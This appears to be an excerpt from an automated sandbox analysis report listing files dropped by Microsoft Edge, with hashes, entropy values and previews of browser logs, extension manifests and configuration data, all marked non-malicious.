                                                                                                                                                                                                                                                                                                                    MD5:BF6C3C8ECB9E9D86B128C7A38165E983
                                                                                                                                                                                                                                                                                                                    SHA1:EEE1048B0E70CAB360CFA3BDE89EC170AC8B3ABB
                                                                                                                                                                                                                                                                                                                    SHA-256:3409259456239EC15A10440CF7A0681B9D55583D7D64E19D340F8196F3FD6222
                                                                                                                                                                                                                                                                                                                    SHA-512:44EE4D5ECC81AB96C2A48AE592A6BD1BB0A73B3FFCC5654E279FD3301B172E9D29C9C501230497A2503D44F3AEAE928D9CEE19635930812FAC93E61F1D17CB3D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):327
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.234858303201866
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0d8FN+q2PcNwi23oH+Tcwt8aPrqIFUt8YCe0dVXZmw+YCe0dV3VkwOcNwi230:fy4+vLZYebL3FUt88yh/+8y1V54ZYebc
                                                                                                                                                                                                                                                                                                                    MD5:AB0D4F12B0E88502946F64A68788B49E
                                                                                                                                                                                                                                                                                                                    SHA1:C0FA932ADBF4F5ABFE5B2E71A6B2F05B4E6FBA95
                                                                                                                                                                                                                                                                                                                    SHA-256:FDBD4673B396050C29D55E67338F170CB3CB9517C682D9539701970C9B9C477A
                                                                                                                                                                                                                                                                                                                    SHA-512:8AB6B4515567697DFCEF7574A95F80022CB2D859C47EF2D6013C0C5D352AE1537C963398B803B4C16B6DCC5B978F0C3B44BB4E24642E5301C14BF44846DAFC32
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.186 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/27-04:49:12.187 bdc Recovering log #3.2024/11/27-04:49:12.187 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):327
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.234858303201866
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0d8FN+q2PcNwi23oH+Tcwt8aPrqIFUt8YCe0dVXZmw+YCe0dV3VkwOcNwi230:fy4+vLZYebL3FUt88yh/+8y1V54ZYebc
                                                                                                                                                                                                                                                                                                                    MD5:AB0D4F12B0E88502946F64A68788B49E
                                                                                                                                                                                                                                                                                                                    SHA1:C0FA932ADBF4F5ABFE5B2E71A6B2F05B4E6FBA95
                                                                                                                                                                                                                                                                                                                    SHA-256:FDBD4673B396050C29D55E67338F170CB3CB9517C682D9539701970C9B9C477A
                                                                                                                                                                                                                                                                                                                    SHA-512:8AB6B4515567697DFCEF7574A95F80022CB2D859C47EF2D6013C0C5D352AE1537C963398B803B4C16B6DCC5B978F0C3B44BB4E24642E5301C14BF44846DAFC32
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.186 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/27-04:49:12.187 bdc Recovering log #3.2024/11/27-04:49:12.187 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2085831074202815
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dz+q2PcNwi23oH+Tcwt865IFUt8YCe0dM8Zmw+YCe0dM8VkwOcNwi23oH+TT:fyz+vLZYeb/WFUt88yM8/+8yM8V54ZY4
                                                                                                                                                                                                                                                                                                                    MD5:B8B519F83AA6D6D82B54868A11C50EC7
                                                                                                                                                                                                                                                                                                                    SHA1:427E0ECF840FA1E5F37010C634C96279AC46BE7E
                                                                                                                                                                                                                                                                                                                    SHA-256:F32716507749EF1DD71ECA903AD5AE9470F206443501BEDDEC50F928C6F54A4A
                                                                                                                                                                                                                                                                                                                    SHA-512:D9DD1EED6652D6BA09532E0488430F9930F398F3F094235B44BCB3F8D5A0B86F8F745773BD292CA3F57772E827B6727C58B0245B9CE14B3EE1FCE9D6B018DED4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.189 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/27-04:49:12.190 bdc Recovering log #3.2024/11/27-04:49:12.190 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2085831074202815
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0dz+q2PcNwi23oH+Tcwt865IFUt8YCe0dM8Zmw+YCe0dM8VkwOcNwi23oH+TT:fyz+vLZYeb/WFUt88yM8/+8yM8V54ZY4
                                                                                                                                                                                                                                                                                                                    MD5:B8B519F83AA6D6D82B54868A11C50EC7
                                                                                                                                                                                                                                                                                                                    SHA1:427E0ECF840FA1E5F37010C634C96279AC46BE7E
                                                                                                                                                                                                                                                                                                                    SHA-256:F32716507749EF1DD71ECA903AD5AE9470F206443501BEDDEC50F928C6F54A4A
                                                                                                                                                                                                                                                                                                                    SHA-512:D9DD1EED6652D6BA09532E0488430F9930F398F3F094235B44BCB3F8D5A0B86F8F745773BD292CA3F57772E827B6727C58B0245B9CE14B3EE1FCE9D6B018DED4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.189 bdc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/27-04:49:12.190 bdc Recovering log #3.2024/11/27-04:49:12.190 bdc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                    MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                    SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                    SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                    SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.17115570817989
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0VP3+q2PcNwi23oH+Tcwt8NIFUt8YCe0V4RZmw+YCe0V4lVkwOcNwi23oH+TG:f6POvLZYebpFUt8864R/+864L54ZYeb2
                                                                                                                                                                                                                                                                                                                    MD5:E2F3C8A757891F9E02D628722BDF0B18
                                                                                                                                                                                                                                                                                                                    SHA1:7FD3874A6B88667CFBD400ADF0342626DF5B1988
                                                                                                                                                                                                                                                                                                                    SHA-256:128FAAAA5F40A53C0FEB24C56323403F9505D33BEE5B53B5369D24B6B4A06C39
                                                                                                                                                                                                                                                                                                                    SHA-512:4B9306C1191C9D9062680EE98ACE4AAF939762A76B891F35546DFD50DB90B1983CBA8857FAB454269C38DFCAD6AA809FDE25DE603CD0D69C83E817A7A0988B3B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.913 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/27-04:49:12.914 1fa8 Recovering log #3.2024/11/27-04:49:12.914 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.17115570817989
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0VP3+q2PcNwi23oH+Tcwt8NIFUt8YCe0V4RZmw+YCe0V4lVkwOcNwi23oH+TG:f6POvLZYebpFUt8864R/+864L54ZYeb2
                                                                                                                                                                                                                                                                                                                    MD5:E2F3C8A757891F9E02D628722BDF0B18
                                                                                                                                                                                                                                                                                                                    SHA1:7FD3874A6B88667CFBD400ADF0342626DF5B1988
                                                                                                                                                                                                                                                                                                                    SHA-256:128FAAAA5F40A53C0FEB24C56323403F9505D33BEE5B53B5369D24B6B4A06C39
                                                                                                                                                                                                                                                                                                                    SHA-512:4B9306C1191C9D9062680EE98ACE4AAF939762A76B891F35546DFD50DB90B1983CBA8857FAB454269C38DFCAD6AA809FDE25DE603CD0D69C83E817A7A0988B3B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.913 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/27-04:49:12.914 1fa8 Recovering log #3.2024/11/27-04:49:12.914 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):8720
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.21838546206064954
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:2X1/l59tFlljq7A/mhWJFuQ3yy7IOWUm//otdweytllrE9SFcTp4AGbNCV9RUIP:2l/K75fOA/wtd0Xi99pEYx
                                                                                                                                                                                                                                                                                                                    MD5:1970121E6B8E4C39876EA53D62BF9F38
                                                                                                                                                                                                                                                                                                                    SHA1:22070BD7ED2D83CC14F63675E86AA2045C37B3F0
                                                                                                                                                                                                                                                                                                                    SHA-256:2E43B17EF28FBC987A9F6FA8A49F4FE01A5B1D896A3ABF8DEC11B74A52B01D7A
                                                                                                                                                                                                                                                                                                                    SHA-512:97C4799552DF43AD6EBB9DA75687146E120B148836DD70F56997FD4B920FF0141805A35456559603BF6A8EAF77F4B788331D14828E893BFCE757E9C2ADA2782C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:..............r....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6481260415575596
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:aj9P012QkQerkjlxP/KbtLcg773pL9hCgam6ItRKToaAu:adPe2mlxP/Ng7Pv9RKcC
                                                                                                                                                                                                                                                                                                                    MD5:8D3B8E3A72C40BAD6B53D27E09419923
                                                                                                                                                                                                                                                                                                                    SHA1:561B9DDED7215DE5C2D7E4FDB64D5EB8A010A62C
                                                                                                                                                                                                                                                                                                                    SHA-256:4C7F428D712485570F5840B0FA241809A64B9AF4D3BB4055663DAED3F371F09C
                                                                                                                                                                                                                                                                                                                    SHA-512:B77E85B650C227FBAE00CBCBF0C87D6C883ABEAA0255D740CDFA2EE41E2E6E5DEB971CF51649C3399815AC058F1B175C7BBF2FC3CEC983B6ACEF67C2323EB624
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):414
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.291244525353224
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:fIOvLZYeb8rcHEZrELFUt88v5/+8vT54ZYeb8rcHEZrEZSJ:fIMlYeb8nZrExg88vNvFoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                    MD5:4110FE0842539D45E2913B49F10C2B2E
                                                                                                                                                                                                                                                                                                                    SHA1:FCF902A89B47D640A8D90BD1640B182F4D4DBD00
                                                                                                                                                                                                                                                                                                                    SHA-256:A10C026CF0C7F7798F666CC92626CDFD33E68465D26AAE9E89CC12CA89D8D8A9
                                                                                                                                                                                                                                                                                                                    SHA-512:EDBC7DDD75D159494C704251D267593D8A9A0525F8B5D714047F292882A25B2E7836187A07C146B7B3B2C93B786D64B9D74A3A501C92D50C9C4EED28FD53AB48
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:16.661 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/27-04:49:16.662 1fa8 Recovering log #3.2024/11/27-04:49:16.662 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):414
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.291244525353224
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:fIOvLZYeb8rcHEZrELFUt88v5/+8vT54ZYeb8rcHEZrEZSJ:fIMlYeb8nZrExg88vNvFoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                    MD5:4110FE0842539D45E2913B49F10C2B2E
                                                                                                                                                                                                                                                                                                                    SHA1:FCF902A89B47D640A8D90BD1640B182F4D4DBD00
                                                                                                                                                                                                                                                                                                                    SHA-256:A10C026CF0C7F7798F666CC92626CDFD33E68465D26AAE9E89CC12CA89D8D8A9
                                                                                                                                                                                                                                                                                                                    SHA-512:EDBC7DDD75D159494C704251D267593D8A9A0525F8B5D714047F292882A25B2E7836187A07C146B7B3B2C93B786D64B9D74A3A501C92D50C9C4EED28FD53AB48
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:16.661 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/27-04:49:16.662 1fa8 Recovering log #3.2024/11/27-04:49:16.662 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1475
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.680199009031777
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:OZWBZjlbWvXys/46gXZFW2sFV03y1x4PzMy0lWeUlHMkTN5zgFHHmi28/V:OZeZZbWvCnjXZs2iV03Sx4PYy0lj8+HH
                                                                                                                                                                                                                                                                                                                    MD5:D26E987CBACE0766A7CFCDC74CF252CA
                                                                                                                                                                                                                                                                                                                    SHA1:5C2055040157700C119EBB95711DE7DB2695C9AB
                                                                                                                                                                                                                                                                                                                    SHA-256:DB0DF8BFA93502FE7274A21E3993A1856F79C56B2C3A277DB2EF2B0D9A761C85
                                                                                                                                                                                                                                                                                                                    SHA-512:441D49681BF3EEBA2E559681EF25F31EB704A60C3B73D7661BDB2A6A94B64B4140AB216D59A97764229BA1FAB3D88B0926245EDF7F35469B0708EACC2AB06684
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:..I..................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1732700968357.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732700969497.._https://ntp.msn.com..MUID!.39EBC277A9596CA639AAD733A8706D90.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732700968451,"schedule":[-1,39,-1,18,-1,-1,16],"scheduleFixed":[-1,39,-1,18,-1,-1,16],"simpleSchedule":[10,31,13,51,12,27,21]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732700968321.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Wed Nov 27 2024 04:49:27 GMT-0500 (Eastern Standa
